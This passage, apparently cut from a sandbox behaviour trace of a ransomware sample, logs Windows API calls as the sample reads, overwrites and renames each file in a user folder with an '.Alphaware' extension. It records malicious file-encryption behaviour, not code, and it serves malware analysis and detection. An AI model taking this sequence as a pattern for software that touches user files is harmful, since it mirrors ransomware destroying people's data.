lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb0ef00, ftCreationTime.dwHighDateTime=0x1d96bca, ftLastAccessTime.dwLowDateTime=0xed24a8e0, ftLastAccessTime.dwHighDateTime=0x1d96df8, ftLastWriteTime.dwLowDateTime=0x829ed8e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0)) returned 1 [0081.247] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0081.247] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Kmo_0PpyMcbzk.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\kmo_0ppymcbzk.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Kmo_0PpyMcbzk.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\kmo_0ppymcbzk.m4a.alphaware")) returned 1 [0081.248] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\OnrpsaEkvylzPJqZCM2l.mkv", dwFileAttributes=0x80) returned 1 [0081.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0081.248] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\OnrpsaEkvylzPJqZCM2l.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\onrpsaekvylzpjqzcm2l.mkv"), fInfoLevelId=0x0, lpFileInformation=0x265b3d8 | out: lpFileInformation=0x265b3d8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf43bd8d0, ftCreationTime.dwHighDateTime=0x1d974d1, ftLastAccessTime.dwLowDateTime=0x482b21f0, ftLastAccessTime.dwHighDateTime=0x1d97575, ftLastWriteTime.dwLowDateTime=0x482b21f0, ftLastWriteTime.dwHighDateTime=0x1d97575, nFileSizeHigh=0x0, nFileSizeLow=0x59a)) returned 1 [0081.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0081.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0081.249] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\OnrpsaEkvylzPJqZCM2l.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\onrpsaekvylzpjqzcm2l.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0081.249] ReadFile (in: hFile=0x254, lpBuffer=0x265bc68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x265bc68*, lpNumberOfBytesRead=0x23ea98*=0x59a, lpOverlapped=0x0) returned 1 [0081.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0081.502] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\OnrpsaEkvylzPJqZCM2l.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\onrpsaekvylzpjqzcm2l.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0081.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0081.504] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\OnrpsaEkvylzPJqZCM2l.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\onrpsaekvylzpjqzcm2l.mkv"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf43bd8d0, ftCreationTime.dwHighDateTime=0x1d974d1, ftLastAccessTime.dwLowDateTime=0x482b21f0, ftLastAccessTime.dwHighDateTime=0x1d97575, ftLastWriteTime.dwLowDateTime=0x82c75040, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x848)) returned 1 [0081.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0081.505] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\OnrpsaEkvylzPJqZCM2l.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\onrpsaekvylzpjqzcm2l.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\OnrpsaEkvylzPJqZCM2l.mkv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\onrpsaekvylzpjqzcm2l.mkv.alphaware")) returned 1 [0081.505] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Qs1EsaM6mnJQuW3k.xlsx", dwFileAttributes=0x80) returned 1 [0081.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0081.506] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Qs1EsaM6mnJQuW3k.xlsx" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\qs1esam6mnjquw3k.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x24de368 | out: lpFileInformation=0x24de368*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x83554ad0, ftCreationTime.dwHighDateTime=0x1d96e59, ftLastAccessTime.dwLowDateTime=0x72c43140, ftLastAccessTime.dwHighDateTime=0x1d9747b, ftLastWriteTime.dwLowDateTime=0x72c43140, ftLastWriteTime.dwHighDateTime=0x1d9747b, nFileSizeHigh=0x0, nFileSizeLow=0x6941)) returned 1 [0081.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0081.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0081.506] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Qs1EsaM6mnJQuW3k.xlsx" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\qs1esam6mnjquw3k.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0081.506] ReadFile (in: hFile=0x254, lpBuffer=0x24de620, nNumberOfBytesToRead=0x6941, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24de620*, lpNumberOfBytesRead=0x23ea98*=0x6941, lpOverlapped=0x0) returned 1 [0081.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0081.529] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Qs1EsaM6mnJQuW3k.xlsx" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\qs1esam6mnjquw3k.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0081.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0081.531] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Qs1EsaM6mnJQuW3k.xlsx" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\qs1esam6mnjquw3k.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83554ad0, ftCreationTime.dwHighDateTime=0x1d96e59, ftLastAccessTime.dwLowDateTime=0x72c43140, ftLastAccessTime.dwHighDateTime=0x1d9747b, ftLastWriteTime.dwLowDateTime=0x82cc1300, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8d34)) returned 1 [0081.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0081.531] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Qs1EsaM6mnJQuW3k.xlsx" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\qs1esam6mnjquw3k.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Qs1EsaM6mnJQuW3k.xlsx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\qs1esam6mnjquw3k.xlsx.alphaware")) returned 1 [0081.532] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\SjIEHWNzBPbEPK.ppt", dwFileAttributes=0x80) returned 1 [0081.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0081.532] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\SjIEHWNzBPbEPK.ppt" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\sjiehwnzbpbepk.ppt"), fInfoLevelId=0x0, lpFileInformation=0x25a6df8 | out: lpFileInformation=0x25a6df8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x14fa0b00, ftCreationTime.dwHighDateTime=0x1d96e15, ftLastAccessTime.dwLowDateTime=0x36702850, ftLastAccessTime.dwHighDateTime=0x1d9754a, ftLastWriteTime.dwLowDateTime=0x36702850, ftLastWriteTime.dwHighDateTime=0x1d9754a, nFileSizeHigh=0x0, nFileSizeLow=0x166ae)) returned 1 [0081.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0081.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0081.533] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\SjIEHWNzBPbEPK.ppt" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\sjiehwnzbpbepk.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0081.533] ReadFile (in: hFile=0x254, lpBuffer=0x1331bcd8, nNumberOfBytesToRead=0x166ae, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x1331bcd8*, lpNumberOfBytesRead=0x23ea98*=0x166ae, lpOverlapped=0x0) returned 1 [0081.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0081.552] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\SjIEHWNzBPbEPK.ppt" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\sjiehwnzbpbepk.ppt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0081.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0081.562] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\SjIEHWNzBPbEPK.ppt" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\sjiehwnzbpbepk.ppt"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14fa0b00, ftCreationTime.dwHighDateTime=0x1d96e15, ftLastAccessTime.dwLowDateTime=0x36702850, ftLastAccessTime.dwHighDateTime=0x1d9754a, ftLastWriteTime.dwLowDateTime=0x82d0d5c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1df08)) returned 1 [0081.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0081.562] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\SjIEHWNzBPbEPK.ppt" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\sjiehwnzbpbepk.ppt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\SjIEHWNzBPbEPK.ppt.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\sjiehwnzbpbepk.ppt.alphaware")) returned 1 [0081.562] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Z3ZXfX.bmp", dwFileAttributes=0x80) returned 1 [0081.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0081.563] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Z3ZXfX.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\z3zxfx.bmp"), fInfoLevelId=0x0, lpFileInformation=0x2624a40 | out: lpFileInformation=0x2624a40*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2160a710, ftCreationTime.dwHighDateTime=0x1d9699b, ftLastAccessTime.dwLowDateTime=0x172cf9a0, ftLastAccessTime.dwHighDateTime=0x1d96f5f, ftLastWriteTime.dwLowDateTime=0x172cf9a0, ftLastWriteTime.dwHighDateTime=0x1d96f5f, nFileSizeHigh=0x0, nFileSizeLow=0x132d3)) returned 1 [0081.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0081.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0081.563] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Z3ZXfX.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\z3zxfx.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0081.563] ReadFile (in: hFile=0x254, lpBuffer=0x2624c98, nNumberOfBytesToRead=0x132d3, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2624c98*, lpNumberOfBytesRead=0x23ea98*=0x132d3, lpOverlapped=0x0) returned 1 [0081.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0081.586] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Z3ZXfX.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\z3zxfx.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0081.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0081.591] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Z3ZXfX.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\z3zxfx.bmp"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2160a710, ftCreationTime.dwHighDateTime=0x1d9699b, ftLastAccessTime.dwLowDateTime=0x172cf9a0, ftLastAccessTime.dwHighDateTime=0x1d96f5f, ftLastWriteTime.dwLowDateTime=0x82d33720, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x199f4)) returned 1 [0081.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0081.591] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Z3ZXfX.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\z3zxfx.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\Z3ZXfX.bmp.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\z3zxfx.bmp.alphaware")) returned 1 [0081.592] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\_7pBY2-omnUcu.gif", dwFileAttributes=0x80) returned 1 [0081.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0081.592] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\_7pBY2-omnUcu.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\_7pby2-omnucu.gif"), fInfoLevelId=0x0, lpFileInformation=0x2502ae0 | out: lpFileInformation=0x2502ae0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x54550780, ftCreationTime.dwHighDateTime=0x1d969c6, ftLastAccessTime.dwLowDateTime=0x22860c70, ftLastAccessTime.dwHighDateTime=0x1d973dc, ftLastWriteTime.dwLowDateTime=0x22860c70, ftLastWriteTime.dwHighDateTime=0x1d973dc, nFileSizeHigh=0x0, nFileSizeLow=0xc8c6)) returned 1 [0081.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0081.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0081.592] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\_7pBY2-omnUcu.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\_7pby2-omnucu.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0081.593] ReadFile (in: hFile=0x254, lpBuffer=0x2502d78, nNumberOfBytesToRead=0xc8c6, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2502d78*, lpNumberOfBytesRead=0x23ea98*=0xc8c6, lpOverlapped=0x0) returned 1 [0081.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0081.613] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\_7pBY2-omnUcu.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\_7pby2-omnucu.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0081.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0081.617] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\_7pBY2-omnUcu.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\_7pby2-omnucu.gif"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54550780, ftCreationTime.dwHighDateTime=0x1d969c6, ftLastAccessTime.dwLowDateTime=0x22860c70, ftLastAccessTime.dwHighDateTime=0x1d973dc, ftLastWriteTime.dwLowDateTime=0x82d7f9e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10c88)) returned 1 [0081.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0081.617] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\_7pBY2-omnUcu.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\_7pby2-omnucu.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\UKlsVP0OeoLUyu0aA\\_7pBY2-omnUcu.gif.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\uklsvp0oeoluyu0aa\\_7pby2-omnucu.gif.alphaware")) returned 1 [0081.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0081.618] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8084c0, ftCreationTime.dwHighDateTime=0x1d96ee5, ftLastAccessTime.dwLowDateTime=0x82d7f9e0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x82d7f9e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.618] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ceff40, ftCreationTime.dwHighDateTime=0x1d97157, ftLastAccessTime.dwLowDateTime=0xd09f55f0, ftLastAccessTime.dwHighDateTime=0x1d97427, ftLastWriteTime.dwLowDateTime=0x827b2440, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x16d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Cj6mvIu4.odt.Alphaware", cAlternateFileName="-CJ6MV~1.ALP")) returned 1 [0081.618] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa54100, ftCreationTime.dwHighDateTime=0x1d969ac, ftLastAccessTime.dwLowDateTime=0xf4a8ece0, ftLastAccessTime.dwHighDateTime=0x1d96b99, ftLastWriteTime.dwLowDateTime=0x82824860, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14908, dwReserved0=0x0, dwReserved1=0x0, cFileName="1BM5 _1HkTZyXvgJAFgc.flv.Alphaware", cAlternateFileName="1BM5_1~1.ALP")) returned 1 [0081.618] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5d9440, ftCreationTime.dwHighDateTime=0x1d97056, ftLastAccessTime.dwLowDateTime=0xad82b670, ftLastAccessTime.dwHighDateTime=0x1d97346, ftLastWriteTime.dwLowDateTime=0x82870b20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x28b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fj0H-XEEG0GP.flv.Alphaware", cAlternateFileName="FJ0H-X~1.ALP")) returned 1 [0081.618] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0ecb90, ftCreationTime.dwHighDateTime=0x1d96f36, ftLastAccessTime.dwLowDateTime=0xd356be60, ftLastAccessTime.dwHighDateTime=0x1d97322, ftLastWriteTime.dwLowDateTime=0x828bcde0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x165f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="grD5c_7rsX_r-Az.doc.Alphaware", cAlternateFileName="GRD5C_~1.ALP")) returned 1 [0081.618] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x572ee5c0, ftCreationTime.dwHighDateTime=0x1d96cd7, ftLastAccessTime.dwLowDateTime=0x5fa6c0a0, ftLastAccessTime.dwHighDateTime=0x1d9720f, ftLastWriteTime.dwLowDateTime=0x829090a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1f2a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IoUNPPwfOO3o6JZNAZ0x.png.Alphaware", cAlternateFileName="IOUNPP~1.ALP")) returned 1 [0081.618] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0c78100, ftCreationTime.dwHighDateTime=0x1d96bf5, ftLastAccessTime.dwLowDateTime=0x31ce380, ftLastAccessTime.dwHighDateTime=0x1d97144, ftLastWriteTime.dwLowDateTime=0x82955360, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13460, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jc7CE.wav.Alphaware", cAlternateFileName="JC7CEW~1.ALP")) returned 1 [0081.618] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb0ef00, ftCreationTime.dwHighDateTime=0x1d96bca, ftLastAccessTime.dwLowDateTime=0xed24a8e0, ftLastAccessTime.dwHighDateTime=0x1d96df8, ftLastWriteTime.dwLowDateTime=0x829ed8e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kmo_0PpyMcbzk.m4a.Alphaware", cAlternateFileName="KMO_0P~1.ALP")) returned 1 [0081.618] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf43bd8d0, ftCreationTime.dwHighDateTime=0x1d974d1, ftLastAccessTime.dwLowDateTime=0x482b21f0, ftLastAccessTime.dwHighDateTime=0x1d97575, ftLastWriteTime.dwLowDateTime=0x82c75040, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x848, dwReserved0=0x0, dwReserved1=0x0, cFileName="OnrpsaEkvylzPJqZCM2l.mkv.Alphaware", cAlternateFileName="ONRPSA~1.ALP")) returned 1 [0081.618] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83554ad0, ftCreationTime.dwHighDateTime=0x1d96e59, ftLastAccessTime.dwLowDateTime=0x72c43140, ftLastAccessTime.dwHighDateTime=0x1d9747b, ftLastWriteTime.dwLowDateTime=0x82cc1300, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8d34, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qs1EsaM6mnJQuW3k.xlsx.Alphaware", cAlternateFileName="QS1ESA~1.ALP")) returned 1 [0081.618] FindNextFileW (in: hFindFile=0xd8a2b0, 